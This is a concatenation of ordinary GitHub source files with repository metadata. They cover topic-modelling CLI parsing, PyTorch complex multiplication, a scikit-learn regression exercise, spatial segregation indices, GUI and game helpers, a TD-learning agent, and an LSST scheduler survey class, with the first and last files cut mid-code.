plot_save_path\n if (psp is not None) and (\"%s\" in psp):\n psp = plot_save_path % iteration\n\n if qdb:\n if n_points is None:\n plot_advancement_qdb_search(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, pred_pos, pred_neg, biased_samples,\n save_path=psp, show=display_plot, xlim=xlim,\n ylim=ylim\n )\n else:\n random_advancement_plot(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, pred_pos, pred_neg, biased_samples,\n n_points, save_path=psp, show=display_plot,\n xlim=xlim, ylim=ylim\n )\n else:\n if n_points is None:\n plot_advancement_uncertainty_search(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, save_path=psp, show=display_plot,\n xlim=xlim, ylim=ylim\n )\n else:\n random_uncertainty_plot(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, n_points=n_points, save_path=psp,\n show=display_plot, xlim=xlim, ylim=ylim)\n\n old_pred = new_pred\n tbis = time.time()\n timer[\"plots\"].append(tbis - t)\n t = tbis\n\n logging.info(\"Saving Callback\")\n # Complete the callback\n callback[\"samples\"].append(sample)\n\n # Save the callback\n if callback_save_path is not None:\n with open(callback_save_path, \"w\") as fp:\n pickle.dump(callback, fp)\n\n tbis = time.time()\n timer[\"callback_save\"].append(tbis - t)\n t = tbis\n\n # Save the timer\n if timer_save_path is not None:\n with open(timer_save_path, \"w\") as fp:\n pickle.dump(timer, fp)\n\n tbis = time.time()\n timer[\"timer_save\"].append(tbis - t)\n\n timer[\"iterations\"].append(tbis - timer[\"total\"][-1] - t0)\n\n logging.info(\"ENF OF STORY BRO\")\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"AlexandreSev/neural_aide","sub_path":"neural_aide/active_search.py","file_name":"active_search.py","file_ext":"py","file_size_in_byte":20685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19643795762","text":"\"\"\"CLI interface using argparse.ArgumentParser\"\"\"\n\nfrom argparse import ArgumentParser\nfrom os import PathLike, getcwd\nfrom os.path import join as path_join, isfile\nfrom glob import 
iglob\n\n\ndef get_cli_parser():\n parser = ArgumentParser(description='Topic modelling utility')\n\n parser.add_argument(\n 'input_dir',\n help='Directory where input text files are located.',\n type=str\n )\n parser.add_argument(\n '--subdir',\n help='Subdir to choose from',\n type=str\n )\n parser.add_argument(\n '-m', '--model',\n help='Path to pretrained topic model',\n type=str\n )\n parser.add_argument(\n '-i', '--infer',\n help='Use specified model to infer on new dataset',\n type=str\n )\n parser.add_argument(\n '-t', '--type',\n help='\"lda\", \"nmf\", \"top2vec\" or \"topic2vec\"',\n default='lda',\n choices=['lda', 'nmf', 'top2vec', 'topic2vec'],\n type=str\n )\n parser.add_argument(\n '-s', '--stopwords',\n help='Path to text file containing stopwords to add',\n default=None,\n type=str\n )\n parser.add_argument(\n '-l', '--logdir',\n help='Directory to dump logs to. Default is $PWD/logs',\n default=getcwd(),\n type=str\n )\n return parser\n\n\ndef get_files(path: PathLike):\n files = iglob(path_join(path, '**/*.txt'), recursive=True)\n for file in files:\n if isfile(file):\n yield file\n\n\ndef get_text(path: PathLike):\n text = []\n with open(path) as f:\n for line in f:\n text.append(line)\n\n return \" \".join(text)\n","repo_name":"mkls6/topic_modeling","sub_path":"src/pkg/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1380796650","text":"import torch\nimport torch.nn as nn\n\ndef complex_multiplication(input_tensor: torch.Tensor, other_tensor: torch.Tensor) -> torch.Tensor:\n complex_index = -1\n real_part = input_tensor[..., 0] * other_tensor[..., 0] - input_tensor[..., 1] * other_tensor[..., 1]\n imaginary_part = input_tensor[..., 0] * other_tensor[..., 1] + input_tensor[..., 1] * other_tensor[..., 0]\n multiplication = torch.cat(\n [\n real_part.unsqueeze(dim=complex_index),\n imaginary_part.unsqueeze(dim=complex_index),\n ],\n dim=complex_index,\n )\n return multiplication\n\nclass ComplexMul_ver0(nn.Module):\n def __init__(self):\n super(ComplexMul_ver0, self).__init__()\n\n def forward(self, x, y):\n return complex_multiplication(x, y)\n\nclass ComplexMul_ver1(torch.autograd.Function):\n @staticmethod\n def symbolic(g, input_tensor, other_tensor, is_conj = True):\n return g.op(\"ComplexMultiplication\", input_tensor, other_tensor, is_conj_i=int(is_conj))\n\n @staticmethod\n def forward(self, input_tensor, other_tensor):\n multiplication = complex_multiplication(input_tensor, other_tensor)\n '''\n complex_index = -1\n real_part = input_tensor[..., 0] * other_tensor[..., 0] - input_tensor[..., 1] * other_tensor[..., 1]\n imaginary_part = input_tensor[..., 0] * other_tensor[..., 1] + input_tensor[..., 1] * other_tensor[..., 0]\n\n multiplication = torch.cat(\n [\n real_part.unsqueeze(dim=complex_index),\n imaginary_part.unsqueeze(dim=complex_index),\n ],\n dim=complex_index,\n )\n '''\n return multiplication\n\n","repo_name":"alanzhai219/OpenVINO_Tutorial","sub_path":"2_Extend/model_export/complex_mul.py","file_name":"complex_mul.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4249870109","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import 
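complex_mul.py above encodes complex numbers as a trailing axis of size 2 and applies (a+bi)(c+di) = (ac-bd) + (ad+bc)i. A quick NumPy cross-check of that formula against the native complex dtype (illustrative only, independent of the torch module):

```python
# Cross-check of the (ac - bd) + (ad + bc)i formula used above,
# comparing against NumPy's native complex multiplication.
import numpy as np

a = np.random.rand(4, 2)  # last axis = [real, imag]
b = np.random.rand(4, 2)

real = a[..., 0] * b[..., 0] - a[..., 1] * b[..., 1]
imag = a[..., 0] * b[..., 1] + a[..., 1] * b[..., 0]

expected = (a[..., 0] + 1j * a[..., 1]) * (b[..., 0] + 1j * b[..., 1])
assert np.allclose(real, expected.real) and np.allclose(imag, expected.imag)
```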
train_test_split\n\n\ndef normalize_transform(to_normalize, column_index, max_value, min_value):\n to_normalize[:, column_index] = (to_normalize[:, column_index] - min_value) / (max_value - min_value)\n return to_normalize\n\ndef get_accuracy_f1(prediction_index, test_labels):\n n_labels = int(np.max(test_labels) + 1)\n set_size = test_labels.shape[0]\n\n # initialize the confusion-matrix counters\n FP = 0\n FN = 0\n TP = 0\n TN = 0\n\n for i in range(n_labels):\n for j in range(set_size):\n\n if test_labels[j] >= i:\n if prediction_index[j] >= i:\n TP += 1\n else:\n FN += 1\n else:\n if prediction_index[j] != i:\n TN += 1\n else:\n FP += 1\n\n P = TP / (TP + FP) # precision\n R = TP / (TP + FN) # recall\n\n F1 = (2 * P * R) / (P + R) # f1 score\n return F1\n\n\nx, y = datasets.load_diabetes(return_X_y=True)\nx = x[:, np.newaxis, 2]\nx=x[:-20]\ny=y[:-20]\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42) # 67% train, 33% test\n\nnormalized_train = x_train\nnormalized_test = x_test\n\niteration=x.shape[1] # min-max normalization (not actually needed for this dataset)\nfor i in range(iteration):\n # renamed from max/min to avoid shadowing the built-ins\n col_max = np.max(x_train[:, i])\n col_min = np.min(x_train[:, i])\n normalized_train = normalize_transform(normalized_train, i, col_max, col_min)\n normalized_test = normalize_transform(normalized_test, i, col_max, col_min)\nx_com_std = np.vstack((normalized_train,normalized_test))\ny_com_std = np.hstack((y_train,y_test))\n\n# logistic regression with C=100.0\nlog_model = LogisticRegression(C=100.0, random_state=0)\nlog_model.fit(x_train, y_train)\nresult = log_model.predict(x_test)\nplt.scatter(x_train,y_train)\nplt.show()\nplt.scatter(result,y_test)\nplt.show()\naccuracy_log = get_accuracy_f1(result,y_test)\nprint(\"Accuracy with logistic regression: \",accuracy_log)\n\n# linear regression (not optimal on this dataset)\nlin_model = LinearRegression()\nlin_model.fit(x_train, y_train)\nlin_result = lin_model.predict(x_test)\nplt.scatter(lin_result,y_test)\nplt.show()\naccuracy_lin= get_accuracy_f1(lin_result,y_test)\nprint(\"Accuracy with linear regression: \",accuracy_lin)","repo_name":"vincydesy/Statistical-Learning","sub_path":"Regression.py","file_name":"Regression.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3329946440","text":"\"\"\"Multigroup Relative Centralization index\"\"\"\n\n__author__ = \"Renan X. Cortes , Sergio J. Rey and Elijah Knaap \"\n\nimport libpysal as lps\nimport numpy as np\nfrom segregation.singlegroup import RelativeCentralization\n\nfrom .._base import MultiGroupIndex, SpatialExplicitIndex\n\nnp.seterr(divide=\"ignore\", invalid=\"ignore\")\n\n\ndef _local_relative_centralization(data, group_pop_var, total_pop_var, W=None, k=5):\n \"\"\"\n Calculation of Local Relative Centralization index for each unit\n\n Parameters\n ----------\n\n data : a geopandas DataFrame with a geometry column.\n \n group_pop_var : string\n The name of variable in data that contains the population size of the group of interest\n \n total_pop_var : string\n The name of variable in data that contains the total population of the unit\n \n k : integer greater than 0. 
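Regression.py fits the min/max statistics on the training split only and reuses them for the test split, which avoids leaking test information into the scaler. The same pattern expressed with scikit-learn's MinMaxScaler (a sketch with made-up numbers, not part of the script above):

```python
# Train-fitted min-max scaling, the same pattern as normalize_transform above.
import numpy as np
from sklearn.preprocessing import MinMaxScaler

x_train = np.array([[1.0], [3.0], [5.0]])
x_test = np.array([[2.0], [6.0]])

scaler = MinMaxScaler().fit(x_train)  # statistics come from the train split only
print(scaler.transform(x_test))       # [[0.25], [1.25]] -- test values may exceed [0, 1]
```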
Default is 5.\n Number of assumed neighbors for local context (it uses the k-nearest neighbour method)\n \n Returns\n -------\n\n statistics : np.array(n)\n Local Relative Centralization values for each unit\n \n core_data : a pandas DataFrame\n A pandas DataFrame that contains the columns used to perform the estimate.\n\n Notes\n -----\n Based on Folch, David C., and Sergio J. Rey. \"The centralization index: A measure of local spatial segregation.\" Papers in Regional Science 95.3 (2016): 555-576.\n \n Reference: :cite:`folch2016centralization`.\n \"\"\"\n\n data = data.copy()\n if not W:\n W = lps.weights.KNN.from_dataframe(data, k=k)\n\n core_data = data[[group_pop_var, total_pop_var, data.geometry.name]]\n\n c_lons = data.centroid.map(lambda p: p.x)\n c_lats = data.centroid.map(lambda p: p.y)\n\n points = list(zip(c_lons, c_lats))\n kd = lps.cg.kdtree.KDTree(np.array(points))\n\n local_RCEs = np.empty(len(data))\n\n for i in range(len(data)):\n\n x = list(W.neighbors.values())[i]\n x.append(\n list(W.neighbors.keys())[i]\n ) # Append the current unit i at the end of its local context\n\n local_data = data.iloc[x, :].copy()\n\n # The center is given by the last position (i.e. the current unit i)\n local_RCE = RelativeCentralization(\n local_data, group_pop_var, total_pop_var, center=len(local_data) - 1\n )\n\n local_RCEs[i] = local_RCE.statistic\n\n return local_RCEs, core_data\n\n\nclass LocalRelativeCentralization(MultiGroupIndex, SpatialExplicitIndex):\n \"\"\"Multigroup Local Relative Centralization Index.\n\n Parameters\n ----------\n data : pandas.DataFrame or geopandas.GeoDataFrame, required\n dataframe or geodataframe if spatial index holding data for location of interest\n groups : list, required\n list of columns on dataframe holding population totals for each group\n w : libpysal.W, optional\n libpysal spatial weights object used to define a local neighborhood. If none is passed,\n a KNN object with k=5 will be used\n network : pandana.Network\n pandana Network object representing the study area\n distance : int\n Maximum distance (in units of geodataframe CRS) to consider the extent of the egohood\n decay : str\n type of decay function to apply\n precompute : bool\n Whether to precompute the pandana Network object\n\n Attributes\n ----------\n statistics : numpy.array\n Local Relative Centralization values for each unit\n core_data : a pandas DataFrame\n DataFrame that contains the columns used to perform the estimate.\n\n Notes\n -----\n Based on Folch, David C., and Sergio J. Rey. 
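The local index above evaluates a single-group statistic over each unit's k-nearest-neighbour context, with the unit itself appended last so it can serve as the centre. A stripped-down sketch of that neighbourhood construction using SciPy's cKDTree, with a plain mean standing in for RelativeCentralization (illustrative only):

```python
# k-nearest-neighbour local statistic sketch; a plain mean replaces the
# RelativeCentralization call above purely for illustration.
import numpy as np
from scipy.spatial import cKDTree

rng = np.random.default_rng(0)
points = rng.random((100, 2))   # centroid coordinates
values = rng.random(100)        # per-unit attribute

tree = cKDTree(points)
k = 5
local_stat = np.empty(len(points))
for i, p in enumerate(points):
    # k neighbours plus the unit itself, mirroring the append above
    _, idx = tree.query(p, k=k + 1)
    local_stat[i] = values[idx].mean()
print(local_stat[:5])
```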
\"The centralization index: A measure of local spatial segregation.\" Papers in Regional Science 95.3 (2016): 555-576.\n \n Reference: :cite:`folch2016centralization`.\n \"\"\"\n\n def __init__(\n self,\n data,\n group_pop_var=None,\n total_pop_var=None,\n w=None,\n network=None,\n distance=None,\n decay=None,\n precompute=None,\n groups=None,\n ):\n \"\"\"Init.\"\"\"\n\n MultiGroupIndex.__init__(self, data, groups)\n if any([w, network, distance]):\n SpatialExplicitIndex.__init__(self)\n aux = _local_relative_centralization(\n self.data, group_pop_var=group_pop_var, total_pop_var=total_pop_var, W=w\n )\n\n self.statistics = aux[0]\n self.data = aux[1]\n self._function = _local_relative_centralization\n","repo_name":"pysal/segregation","sub_path":"segregation/local/local_relative_centralization.py","file_name":"local_relative_centralization.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"37"} +{"seq_id":"10902786176","text":"import wx\n\nclass ProgressDialog(wx.Dialog):\n def __init__(self, parent, currentRunningThread, parentDialog):\n if parentDialog:\n wx.Dialog.__init__(self, parentDialog, wx.ID_ANY, \"Progress information\", size= (610,222))\n else:\n wx.Dialog.__init__(self, parent, wx.ID_ANY, \"Progress information\", size= (610,222))\n self.parent = parent\n self.parent.setCancelProgress(False)\n self.thread = currentRunningThread\n self.panel = wx.Panel(self,wx.ID_ANY)\n self.gauge = wx.Gauge(self.panel,size=(582,20),pos=(12,80), style=wx.GA_HORIZONTAL)\n self.textLabel = wx.StaticText(self.panel, label=\"Operation in progress...\", pos=(12,20))\n self.cancelButton =wx.Button(self.panel, size=(105,27), label=\"Cancel\", pos=(490,155))\n self.cancelButton.Bind(wx.EVT_BUTTON, self.OnQuit)\n self.Bind(wx.EVT_CLOSE, self.OnQuit)\n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER,self.OnTimer, self.timer)\n self.timer.Start(30)\n self.gauge.SetRange(500)\n self.gauge.SetValue(0)\n self.step = 1\n self.Show()\n\n def OnTimer(self, evt):\n if self.thread.isAlive():\n x = int(self.gauge.GetValue())\n if x >= 500:\n x = 0\n x += self.step\n self.gauge.SetValue(x)\n else:\n self.OnQuit(None)\n\n def OnQuit(self, event):\n if self.thread.isAlive():\n self.parent.setCancelProgress(True)\n self.parent.stopCurrentProcess()\n self.thread.join()\n self.timer.Stop()\n self.Destroy()\n\n","repo_name":"OpenClovis/SAFplus-Availability-Scalability-Platform","sub_path":"src/ide/progressdialog.py","file_name":"progressdialog.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"161608111","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n\t\"\"\"A class that manages the bullets shot by the spaceship.\"\"\"\n\t\n\tdef __init__(self, ai_settings, screen, ship):\n\t\t\"\"\"\n\t\tCreates an object of the bullet on the the spaceship current \n\t\tposition.\n\t\t\"\"\"\n\t\tsuper(Bullet, self).__init__()\n\t\tself.screen = screen\n\t\t\n\t\t# Creates a rectangle for the project in (0,0) then defines the\n\t\t# correct position\n\t\tself.rect = pygame.Rect(0, 0, ai_settings.bullet_width,\n\t\t\tai_settings.bullet_height)\n\t\tself.rect.centerx = ship.rect.centerx\n\t\tself.rect.top = ship.rect.top\n\t\t\n\t\t# Stores the bullet current position with a decimal value\n\t\tself.y = float(self.rect.y)\n\t\t\n\t\tself.color = ai_settings.bullet_color\n\t\tself.speed_factor = 
ai_settings.bullet_speed_factor\n\t\t\n\tdef update(self):\n\t\t\"\"\"Moves the the bullet up on the screen.\"\"\"\n\t\t# Updates the bullet decimals position\n\t\tself.y -= self.speed_factor\n\t\t# Updates the rect's position\n\t\tself.rect.y = self.y\n\t\t\n\tdef draw_bullet(self):\n\t\t\"\"\"Draws the bullet on the screen.\"\"\"\n\t\tpygame.draw.rect(self.screen, self.color, self.rect)\n","repo_name":"Kalviskin/alien_invasion","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4943529493","text":"import tensorflow as tf\nimport numpy as np\nfrom agents.agent_base import AgentBase\n\n\nclass ForwardAgent(AgentBase):\n def __init__(self,\n name,\n model,\n env,\n verbose=False):\n\n AgentBase.__init__(self, name, model, env)\n\n self.opt = tf.train.AdamOptimizer()\n\n self.verbose = verbose\n\n self.grads = tf.gradients(self.model.value, self.model.trainable_variables)\n\n self.grads_s = [tf.placeholder(tf.float32, shape=tvar.get_shape()) for tvar in self.model.trainable_variables]\n\n self.apply_grads = self.opt.apply_gradients(zip(self.grads_s, self.model.trainable_variables),\n name='apply_grads')\n\n def train(self, epsilon):\n\n lamda = 0.7\n\n self.env.reset()\n\n grads_seq = []\n value_seq = []\n reward = self.env.get_reward()\n\n while reward is None:\n feature_vector = self.env.make_feature_vector(self.env.board)\n value, grads = self.sess.run([self.model.value, self.grads],\n feed_dict={self.model.feature_vector_: feature_vector})\n value_seq.append(value)\n grads_seq.append(grads)\n\n if np.random.random() < epsilon:\n self.env.make_random_move()\n else:\n move = self.get_move()\n self.env.make_move(move)\n\n reward = self.env.get_reward()\n\n value_seq.append(np.array([reward]))\n\n delta_seq = np.array([j - i for i, j in zip(value_seq[:-1], value_seq[1:])])\n # delta_seq[:-1] = delta_seq[:-1] * (1.0 - lamda)\n\n for t, grads in enumerate(grads_seq):\n delta_sum = np.sum([(lamda ** j) * delta for j, delta in enumerate(delta_seq[t:])])\n self.sess.run(self.apply_grads,\n feed_dict={grad_: -grad * delta_sum\n for grad_, grad in zip(self.grads_s, grads)})\n\n return reward\n","repo_name":"adamklec/tic_tac_tensorflow","sub_path":"agents/forward_agent.py","file_name":"forward_agent.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6274517441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 29 01:37:03 2022\r\n\r\n@author: salma obeidat\r\n\"\"\"\r\n\r\nt=int(input())\r\nfor i in range(t):\r\n operations=0\r\n a,b,n=list(map(int,input().split()))\r\n while(max(a,b)<=n):\r\n if(a 0 or (iter + 2) * self.block_size > len(order):\n break\n return observations\n\n\nclass BlobSurvey(GreedySurvey):\n \"\"\"Select observations in large, mostly contiguous, blobs.\n\n Parameters\n ----------\n filtername1 : `str`\n The filter to observe in.\n filtername2 : `str`\n The filter to pair with the first observation. If set to None, no pair\n will be observed.\n slew_approx : `float`\n The approximate slewtime between neerby fields (seconds). Used to calculate\n how many observations can be taken in the desired time block.\n nexp : `int`\n The number of exposures to take in a visit.\n exp_dict : `dict`\n If set, should have keys of filtername and values of ints that are the nuber of exposures to take\n per visit. 
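ForwardAgent.train above stores the per-step value gradients, forms one-step TD errors, and weights each future error by lambda**j before applying it — a forward-view TD(lambda) update. The same arithmetic on a tiny linear value function in plain NumPy (a sketch; the 3-step episode and features are made up):

```python
# Forward-view TD(lambda) on a linear value function, mirroring the
# delta_seq / lamda**j weighting above.  Toy 3-step episode.
import numpy as np

lam, alpha = 0.7, 0.1
w = np.zeros(2)
features = [np.array([1.0, 0.0]), np.array([0.0, 1.0]), np.array([1.0, 1.0])]
reward = 1.0                                   # terminal reward only

values = [w @ f for f in features] + [reward]  # V(s_0..s_2) plus terminal value
deltas = [values[t + 1] - values[t] for t in range(len(features))]

for t, f in enumerate(features):
    # lambda-weighted sum of future TD errors, as in delta_sum above
    delta_sum = sum((lam ** j) * d for j, d in enumerate(deltas[t:]))
    w += alpha * delta_sum * f                 # gradient of a linear V is the feature
print(w)
```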
For estimating block time, nexp is still used.\n filter_change_approx : `float`\n The approximate time it takes to change filters (seconds).\n ideal_pair_time : `float`\n The ideal time gap wanted between observations to the same pointing (minutes)\n min_pair_time : `float`\n The minimum acceptable pair time (minutes)\n flush_time : `float`\n The time past the final expected exposure to flush the queue. Keeps observations\n from lingering past when they should be executed. (minutes)\n twilight_scale : `bool`\n Scale the block size to fill up to twilight. Set to False if running in twilight\n in_twilight : `bool`\n Scale the block size to stay within twilight time.\n check_scheduled : `bool`\n Check if there are scheduled observations and scale blob size to match\n min_area : `float`\n If set, demand the reward function have an area of so many square degrees before executing\n grow_blob : `bool`\n If True, try to grow the blob from the global maximum. Otherwise, just use a simple sort.\n Simple sort will not constrain the blob to be contiguous.\n max_radius_peak : `float`\n The maximum radius to demand things be within the maximum of the reward function. (degrees)\n Note that traveling salesman solver can have rare failures if this is set too large\n (probably issue with projection effects or something).\n \"\"\"\n\n def __init__(\n self,\n basis_functions,\n basis_weights,\n filtername1=\"r\",\n filtername2=\"g\",\n slew_approx=7.5,\n filter_change_approx=140.0,\n read_approx=2.0,\n exptime=30.0,\n nexp=2,\n nexp_dict=None,\n ideal_pair_time=22.0,\n min_pair_time=15.0,\n flush_time=30.0,\n smoothing_kernel=None,\n nside=None,\n dither=True,\n seed=42,\n ignore_obs=None,\n survey_note=\"blob\",\n detailers=None,\n camera=\"LSST\",\n twilight_scale=True,\n in_twilight=False,\n check_scheduled=True,\n min_area=None,\n grow_blob=True,\n area_required=None,\n max_radius_peak=40.0,\n fields=None,\n survey_name=\"\",\n **kwargs,\n ):\n self.filtername1 = filtername1\n self.filtername2 = filtername2\n\n super(BlobSurvey, self).__init__(\n basis_functions=basis_functions,\n basis_weights=basis_weights,\n filtername=None,\n block_size=0,\n smoothing_kernel=smoothing_kernel,\n dither=dither,\n seed=seed,\n ignore_obs=ignore_obs,\n nside=nside,\n detailers=detailers,\n camera=camera,\n area_required=area_required,\n fields=fields,\n )\n self.flush_time = flush_time / 60.0 / 24.0 # convert to days\n self.nexp = nexp\n self.nexp_dict = nexp_dict\n self.exptime = exptime\n self.slew_approx = slew_approx\n self.read_approx = read_approx\n self.hpids = np.arange(hp.nside2npix(self.nside))\n self.twilight_scale = twilight_scale\n self.in_twilight = in_twilight\n self.grow_blob = grow_blob\n self.max_radius_peak = np.radians(max_radius_peak)\n\n if self.twilight_scale & self.in_twilight:\n warnings.warn(\"Both twilight_scale and in_twilight are set to True. 
That is probably wrong.\")\n\n self.min_area = min_area\n self.check_scheduled = check_scheduled\n # If we are taking pairs in same filter, no need to add filter change time.\n if filtername1 == filtername2:\n filter_change_approx = 0\n # Compute the minimum time needed to observe a blob (or observe, then repeat.)\n if filtername2 is not None:\n self.time_needed = (\n (min_pair_time * 60.0 * 2.0 + exptime + read_approx + filter_change_approx) / 24.0 / 3600.0\n ) # Days\n else:\n self.time_needed = (min_pair_time * 60.0 + exptime + read_approx) / 24.0 / 3600.0 # Days\n self.filter_set = set(filtername1)\n if filtername2 is None:\n self.filter2_set = self.filter_set\n else:\n self.filter2_set = set(filtername2)\n\n self.ra, self.dec = _hpid2_ra_dec(self.nside, self.hpids)\n\n self.survey_note = survey_note\n self.counter = 1 # start at 1, because 0 is default in empty observation\n self.min_pair_time = min_pair_time\n self.ideal_pair_time = ideal_pair_time\n\n self.pixarea = hp.nside2pixarea(self.nside, degrees=True)\n\n # If we are only using one filter, this could be useful\n if (self.filtername2 is None) | (self.filtername1 == self.filtername2):\n self.filtername = self.filtername1\n\n def _generate_survey_name(self):\n self.survey_name = f\"Blob survey {self.filtername1}\"\n if self.filtername2 is None:\n self.survey_name += f\"_{self.filtername1}\"\n else:\n self.survey_name += f\"_{self.filtername2}\"\n\n def _check_feasibility(self, conditions):\n \"\"\"\n Check if the survey is feasable in the current conditions.\n \"\"\"\n for bf in self.basis_functions:\n result = bf.check_feasibility(conditions)\n if not result:\n return result\n\n # If we need to check that the reward function has enough area available\n if self.min_area is not None:\n reward = 0\n for bf, weight in zip(self.basis_functions, self.basis_weights):\n basis_value = bf(conditions)\n reward += basis_value * weight\n max_reward_indx = np.min(np.where(reward == np.nanmax(reward)))\n distances = _angular_separation(\n self.ra, self.dec, self.ra[max_reward_indx], self.dec[max_reward_indx]\n )\n valid_pix = np.where((np.isnan(reward) == False) & (distances < self.max_radius_peak))[0]\n if np.size(valid_pix) * self.pixarea < self.min_area:\n result = False\n return result\n\n def _set_block_size(self, conditions):\n \"\"\"\n Update the block size if it's getting near a break point.\n \"\"\"\n\n # If we are trying to get things done before twilight\n if self.twilight_scale:\n available_time = conditions.sun_n18_rising - conditions.mjd\n available_time *= 24.0 * 60.0 # to minutes\n n_ideal_blocks = available_time / self.ideal_pair_time\n else:\n n_ideal_blocks = 4\n\n # If we are trying to get things done before a scheduled simulation\n if self.check_scheduled:\n if len(conditions.scheduled_observations) > 0:\n available_time = np.min(conditions.scheduled_observations) - conditions.mjd\n available_time *= 24.0 * 60.0 # to minutes\n n_blocks = available_time / self.ideal_pair_time\n if n_blocks < n_ideal_blocks:\n n_ideal_blocks = n_blocks\n\n # If we are trying to complete before twilight ends or the night ends\n if self.in_twilight:\n at1 = conditions.sun_n12_rising - conditions.mjd\n at2 = conditions.sun_n18_setting - conditions.mjd\n times = np.array([at1, at2])\n times = times[np.where(times > 0)]\n available_time = np.min(times)\n available_time *= 24.0 * 60.0 # to minutes\n n_blocks = available_time / self.ideal_pair_time\n if n_blocks < n_ideal_blocks:\n n_ideal_blocks = n_blocks\n\n if n_ideal_blocks >= 3:\n 
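At this point `_set_block_size` turns the minutes remaining into a visit count: one visit costs roughly slew + exposure + readout*(nexp-1) seconds. Worked numbers for the class defaults above (just the arithmetic, stated outside the class):

```python
# Visits that fit in one ideal pair block, using the BlobSurvey defaults above.
import math

ideal_pair_time = 22.0   # minutes
slew_approx, exptime, read_approx, nexp = 7.5, 30.0, 2.0, 2

visit_cost = slew_approx + exptime + read_approx * (nexp - 1)   # 39.5 s per visit
nvisit_block = math.floor(ideal_pair_time * 60.0 / visit_cost)  # 33 visits
print(visit_cost, nvisit_block)
```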
self.nvisit_block = int(\n np.floor(\n self.ideal_pair_time\n * 60.0\n / (self.slew_approx + self.exptime + self.read_approx * (self.nexp - 1))\n )\n )\n else:\n # Now we can stretch or contract the block size to allocate the remainder time until twilight starts\n # We can take the remaining time and try to do 1,2, or 3 blocks.\n possible_times = available_time / np.arange(1, 4)\n diff = np.abs(self.ideal_pair_time - possible_times)\n best_block_time = np.max(possible_times[np.where(diff == np.min(diff))])\n self.nvisit_block = int(\n np.floor(\n best_block_time\n * 60.0\n / (self.slew_approx + self.exptime + self.read_approx * (self.nexp - 1))\n )\n )\n\n # The floor can set block to zero, make it possible to to just one\n if self.nvisit_block <= 0:\n self.nvisit_block = 1\n\n def calc_reward_function(self, conditions):\n # Set the number of observations we are going to try and take\n self._set_block_size(conditions)\n # Computing reward like usual with basis functions and weights\n if self._check_feasibility(conditions):\n self.reward = 0\n indx = np.arange(hp.nside2npix(self.nside))\n for bf, weight in zip(self.basis_functions, self.basis_weights):\n basis_value = bf(conditions, indx=indx)\n self.reward += basis_value * weight\n if self.smoothing_kernel is not None:\n self.smooth_reward()\n else:\n self.reward = -np.inf\n return self.reward\n\n if self.area_required is not None:\n max_indices = np.where(self.reward == np.nanmax(self.reward))[0]\n if np.size(max_indices) == 0:\n # This is the case if everything is masked\n self.reward = -np.inf\n else:\n max_reward_indx = np.min(max_indices)\n distances = _angular_separation(\n self.ra,\n self.dec,\n self.ra[max_reward_indx],\n self.dec[max_reward_indx],\n )\n good_area = np.where((np.abs(self.reward) >= 0) & (distances < self.max_radius_peak))[\n 0\n ].size * hp.nside2pixarea(self.nside)\n if good_area < self.area_required:\n self.reward = -np.inf\n\n self.reward_checked = True\n return self.reward\n\n def simple_order_sort(self):\n \"\"\"Fall back if we can't link contiguous blobs in the reward map\"\"\"\n\n # Assuming reward has already been calcualted\n\n potential_hp = np.where(~np.isnan(self.reward) == True)\n\n # Note, using nanmax, so masked pixels might be included in the pointing.\n # I guess I should document that it's not \"NaN pixels can't be observed\", but\n # \"non-NaN pixles CAN be observed\", which probably is not intuitive.\n ufields, reward_by_field = int_binned_stat(\n self.hp2fields[potential_hp], self.reward[potential_hp], statistic=np.nanmax\n )\n # chop off any nans\n not_nans = np.where(~np.isnan(reward_by_field) == True)\n ufields = ufields[not_nans]\n reward_by_field = reward_by_field[not_nans]\n\n order = np.argsort(reward_by_field)\n ufields = ufields[order][::-1][0 : self.nvisit_block]\n self.best_fields = ufields\n\n def generate_observations_rough(self, conditions):\n \"\"\"\n Find a good block of observations.\n \"\"\"\n\n self.reward = self.calc_reward_function(conditions)\n\n # Mask off pixels that are far away from the maximum.\n max_reward_indx = np.min(np.where(self.reward == np.nanmax(self.reward)))\n distances = _angular_separation(\n self.ra, self.dec, self.ra[max_reward_indx], self.dec[max_reward_indx]\n )\n\n self.reward[np.where(distances > self.max_radius_peak)] = np.nan\n # Check if we need to spin the tesselation\n if self.dither & (conditions.night != self.night):\n self._spin_fields(conditions)\n self.night = copy(conditions.night)\n\n if self.grow_blob:\n # Note, returns highest first\n 
